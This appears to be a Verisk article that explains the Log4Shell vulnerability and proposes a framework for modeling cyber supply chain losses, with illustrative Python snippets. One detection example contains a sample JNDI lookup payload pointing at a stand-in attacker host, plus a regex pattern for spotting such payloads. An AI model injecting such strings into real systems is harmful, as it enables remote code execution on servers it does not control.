You’d have to have been living under a rock in December 2021 not to have heard of the Log4Shell vulnerability. Log4Shell is the name given to a zero-day vulnerability in the Log4j logging library. The library is a common component of programs written in Java, which is itself one of the most widely used programming languages. As such, the vulnerability, which was privately disclosed to the library’s creators on November 24, 2021, and publicly disclosed on December 9, is present in a very large number of programs.
Making matters worse, the vulnerability is straightforward to exploit and allows for remote code execution. This ease of exploitation makes it far worse than other widespread and dangerous vulnerabilities, such as Meltdown and Spectre (a pair of hardware vulnerabilities discovered in 2017).
How Bad Is Log4Shell and How Bad Could It Be?
Before addressing how bad it is, let’s tackle the easier question: How bad could it be? The vulnerability is a perfect storm: It’s present in a very widely used library; it’s easy to exploit; and the consequences—remote code execution—are severe.
Therefore, the worst-case scenario is clear: The losses from Log4Shell could surpass those of NotPetya. This applies both to ground-up (economic) loss, estimated at USD 10 billion for NotPetya, and to gross losses to affirmative cyber insurance policies, estimated at over USD 300 million.
To attempt to answer the question of how bad Log4Shell is, one must examine the various sources of uncertainty.
The first source of uncertainty is on the technical side. The mere fact that a program uses a vulnerable version of Log4j doesn’t necessarily mean the program will be vulnerable to it. The feature of Log4j that allows for this vulnerability—called JNDI lookups—may, for example, have been turned off. It’s turned on by default, however, so this isn’t a likely scenario.
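To make the mechanism concrete, the sketch below shows the general shape of a JNDI lookup string and a deliberately naive check for it. It is written in Python purely for illustration (Log4j itself is a Java library). The function name `contains_jndi_lookup` and the sample values are assumptions, and real payloads are often obfuscated in ways this simple pattern would miss.

```python
import re

# Naive pattern for an unobfuscated lookup token such as ${jndi:ldap://host/a}.
# This illustrates the string format only; it is not a reliable detector,
# because attackers commonly obfuscate the token (nested lookups, mixed case).
JNDI_LOOKUP = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)


def contains_jndi_lookup(logged_text: str) -> bool:
    """Return True if the text contains a plain ${jndi:...} lookup token."""
    return JNDI_LOOKUP.search(logged_text) is not None


# Hypothetical values that a program might pass to its logger.
user_controlled_header = "${jndi:ldap://attacker.example/a}"
fixed_message = "Service started on port 8080"

print(contains_jndi_lookup(user_controlled_header))  # True
print(contains_jndi_lookup(fixed_message))           # False
```

The point of the example is that the danger arises only when text of this shape reaches the logger, which is why it matters whether lookups are enabled and whether outsiders can influence what is logged.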
Another factor is the way that the logging library is used by a program. The library is only one component within a larger program, so it may be that there isn’t a way to trigger the vulnerability because the user can’t directly control what gets logged by Log4j. As it stands, the most complete list of affected programs we’ve been able to find is available from the Cybersecurity and Infrastructure Security Agency’s GitHub page (Table 1).
Table 1. Status categories used in the CISA list: Unknown (default) | Affected | Not Affected | Fixed | Under Investigation
These are mutually exclusive categories, so the fixed programs were in the affected category earlier on. Obviously, there are far more than 2,000 software programs in the world, but this is still useful information. Among those programs known either to have been or not to have been affected, approximately 30% were affected—more than 80% of which weren’t fixed within two weeks of public disclosure.
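The two percentages can be read as simple ratios over the status categories. The sketch below spells out that arithmetic. The function names are hypothetical, and the counts are invented placeholders chosen only to land near the percentages quoted above; they are not the actual CISA figures.

```python
def affected_share(affected: int, fixed: int, not_affected: int) -> float:
    """Share of programs with a known status that were affected at some point."""
    # Fixed programs were in the affected category earlier on, so count both.
    ever_affected = affected + fixed
    return ever_affected / (ever_affected + not_affected)


def unfixed_share(affected: int, fixed: int) -> float:
    """Share of ever-affected programs that have not yet been fixed."""
    return affected / (affected + fixed)


# Placeholder counts for illustration only (NOT the CISA data).
affected, fixed, not_affected = 250, 50, 700

print(f"{affected_share(affected, fixed, not_affected):.0%}")  # 30%
print(f"{unfixed_share(affected, fixed):.0%}")                 # 83%
```

Programs whose status is unknown or under investigation are left out of both ratios, which is why the shares describe only the programs with a known status.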
We can therefore conclude that an extraordinarily large number of programs are indeed affected and that most don’t even have patches available at this time. A sizeable organization should expect to have at least one impacted program. It is also reasonable to assume that it will be a long time before vendors issue patches for most programs, and even longer before most organizations install those patches.
Another source of uncertainty is what malicious threat actors will use the vulnerability for. As noted by SC Media, the first to exploit new vulnerabilities are typically botnets and cryptocurrency miners—there is evidence that they were already trying “spray and pray” tactics within hours of public disclosure. These kinds of attacks aren’t particularly damaging to organizations, but more costly attacks such as data compromise or ransomware are sure to occur (and to have already occurred) as well.
It should also be noted that, unlike events such as WannaCry, NotPetya, or a long cloud downtime event, the Log4Shell “event” should more accurately be described as a large number of distinct events, carried out by multiple threat actors with distinct objectives. Moreover, it is quite possible that many events in which systems were compromised due to the Log4Shell vulnerability will never be identified as such. Thus, the true losses from Log4Shell may never be known.
Modeling Cyber Supply Chain Events
Last year saw numerous major cyber supply chain events, beginning with SolarWinds, followed by Accellion, the Microsoft Exchange Server hacks, and Kaseya. Creating a model of such events poses numerous challenges, especially when building a probabilistic model.
First, the list of potential supply chain events is at least as long as the list of software programs, as any of these could have a vulnerability that serves as a point of aggregation (a single point of failure). Clearly, it is futile to try to create a comprehensive list of all software. It follows that any supply chain model will never be complete from the point of view of the list of potential events.
But what if the goal is for a model to have reasonably complete coverage of the costliest events? In principle, one could compile a list of the most used programs, along with estimates of how many customers each has. The Log4Shell vulnerability illustrates, however, why such a list would be insufficient: the potential points of aggregation include not only individual programs but also libraries and components of programs.
Attempting to create a comprehensive list of widely used libraries, including those that are open source, is another futile endeavor. Moreover, the creation of such a list would be only one step in estimating potential losses, as it would also be necessary to know what programs the libraries are used in, something that isn’t currently tracked. It is for this reason that the list of programs vulnerable to Log4Shell is being constructed by crowdsourcing weeks after the vulnerability’s public disclosure. A complicating factor, as previously mentioned, is that not all programs that use an impacted version of Log4j will necessarily be vulnerable.
Ultimately, estimating potential losses from supply chain attacks, including those that impact libraries, will require tracking the libraries and components that are part of various pieces of software. This concept is known as a software bill of materials (SBoM), which is like a list of ingredients for software. As early as 2014, legislation was proposed in the U.S. that would have required government agencies to obtain SBoMs for any products they purchased. The legislation didn’t pass, but with the recent increase in high-profile supply chain attacks, there has been renewed interest in SBoM mandates. For the moment, however, SBoMs are only a proposal, and a supply chain model must therefore do without them.
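As a rough illustration of why SBoMs would help, the sketch below shows how a list of ingredients per program would turn "which programs include an old version of a given library?" into a simple lookup. Everything here is hypothetical: the program names, the data layout, and the function `programs_with_component_below` are assumptions, and the version comparison handles only purely numeric dotted versions. As noted above, containing an impacted version does not by itself prove a program is exploitable.

```python
from typing import Dict, List, Tuple

Version = Tuple[int, ...]
# Assumed layout: program name -> list of (component name, version string).
Sbom = Dict[str, List[Tuple[str, str]]]


def parse_version(text: str) -> Version:
    """Parse a purely numeric dotted version such as '2.14.1'."""
    return tuple(int(part) for part in text.split("."))


def programs_with_component_below(sboms: Sbom, component: str, fixed_in: str) -> List[str]:
    """List programs whose SBoM includes `component` at a version older than `fixed_in`."""
    fixed = parse_version(fixed_in)
    hits = []
    for program, components in sboms.items():
        for name, version in components:
            if name == component and parse_version(version) < fixed:
                hits.append(program)
                break  # one match is enough to flag the program
    return hits


# Hypothetical SBoMs for three made-up programs.
sboms: Sbom = {
    "billing-service": [("log4j-core", "2.14.1"), ("jackson-databind", "2.12.3")],
    "report-tool": [("log4j-core", "2.17.1")],
    "intranet-portal": [("slf4j-api", "1.7.30")],
}

# The "2.15.0" threshold is a simplifying assumption for this example.
print(programs_with_component_below(sboms, "log4j-core", "2.15.0"))  # ['billing-service']
```

Without SBoMs, the mapping held in `sboms` simply does not exist in one place, which is why the list of affected programs had to be assembled by crowdsourcing.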
Taking these issues into account, supply chain models must be built bearing in mind that any explicit list of potential points of aggregation is going to be far from complete from the perspectives of both event frequency and potential losses. Verisk therefore proposes a framework consisting of a mix of explicit and abstract events.
Explicit events would model scenarios for known points of aggregation. As is generally the case with Verisk’s cyber models, detailed data on which companies use which affected points of aggregation should be used where available. Such data is used for our various service provider downtime event models, for example.
Abstract events, on the other hand, would model events for unknown points of aggregation. Notably, the latter category would include software libraries. In either a deterministic or probabilistic model, expert opinion would be used to determine (a distribution for) the proportion of companies that are vulnerable to the abstract event. In the context of a probabilistic model, expert opinion would also be used to estimate what proportion of all events are abstract, that is, not covered by the known explicit events.
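One way to picture the mix of explicit and abstract events in a probabilistic setting is the sketch below. It is not Verisk’s implementation: the function `draw_event`, the Beta distribution used to stand in for expert opinion, and every number are assumptions chosen for illustration.

```python
import random
from typing import List, Tuple


def draw_event(
    rng: random.Random,
    abstract_share: float,
    explicit_events: List[Tuple[str, float]],
    alpha: float,
    beta: float,
) -> Tuple[str, float]:
    """Draw one event and the proportion of companies exposed to it.

    abstract_share: assumed (expert-elicited) share of events that are abstract.
    explicit_events: (name, proportion of companies using that point of aggregation).
    alpha, beta: parameters of a Beta distribution standing in for expert opinion
                 on the proportion of companies vulnerable to an abstract event.
    """
    if rng.random() < abstract_share:
        # Unknown point of aggregation: sample the exposed proportion.
        return "abstract", rng.betavariate(alpha, beta)
    # Known point of aggregation: exposure comes from usage data.
    return rng.choice(explicit_events)


# Hypothetical inputs.
explicit = [("cloud-provider-A", 0.30), ("email-server-B", 0.12)]
rng = random.Random(42)
events = [draw_event(rng, 0.4, explicit, 2.0, 8.0) for _ in range(10_000)]

abstract_fraction = sum(name == "abstract" for name, _ in events) / len(events)
print(f"simulated share of abstract events: {abstract_fraction:.2f}")
```

In a deterministic model the same structure would apply with a single chosen proportion in place of the sampled one.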
Beyond the differentiation between explicit and abstract events, a model must also take into consideration that, for some events, not every company that uses the affected point of aggregation will necessarily be impacted. This comes down to the compromise mechanism. In some cases, a compromised supplier could be used as a means of distributing malware to that supplier’s clients, in which case the vast majority of clients would indeed be impacted.
But in a case such as Log4Shell, the point of aggregation simply opens a vulnerability that attackers can exploit if they choose to (and act quickly enough). Thus, not every vulnerable company will be impacted. This is what we refer to as the incomplete aggregation framework and it is currently used by Verisk to model systemic ransomware events such as WannaCry and NotPetya.
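The difference between the two compromise mechanisms can be sketched as a per-company probability of being impacted, given that the company is vulnerable. This is a minimal illustration under stated assumptions, not the actual model: the function `impacted_companies`, the company names, and the probabilities are all hypothetical.

```python
import random
from typing import List


def impacted_companies(
    vulnerable: List[str], attack_probability: float, rng: random.Random
) -> List[str]:
    """Return the vulnerable companies that are actually impacted.

    Each vulnerable company is impacted independently with the given
    probability; 1.0 corresponds to complete aggregation.
    """
    return [c for c in vulnerable if rng.random() < attack_probability]


rng = random.Random(7)
vulnerable = [f"company-{i}" for i in range(1000)]  # hypothetical portfolio

# Malware pushed through a compromised supplier: treated here as the limiting
# case in which every vulnerable client is hit.
pushed = impacted_companies(vulnerable, 1.0, rng)

# Opportunistic exploitation of an open vulnerability: only some are hit.
# The 0.1 probability is an assumed value for illustration.
opportunistic = impacted_companies(vulnerable, 0.1, rng)

print(len(pushed), len(opportunistic))
```

Treating companies as independent is itself a simplification; a fuller treatment might let the probability vary by company size, sector, or patching speed.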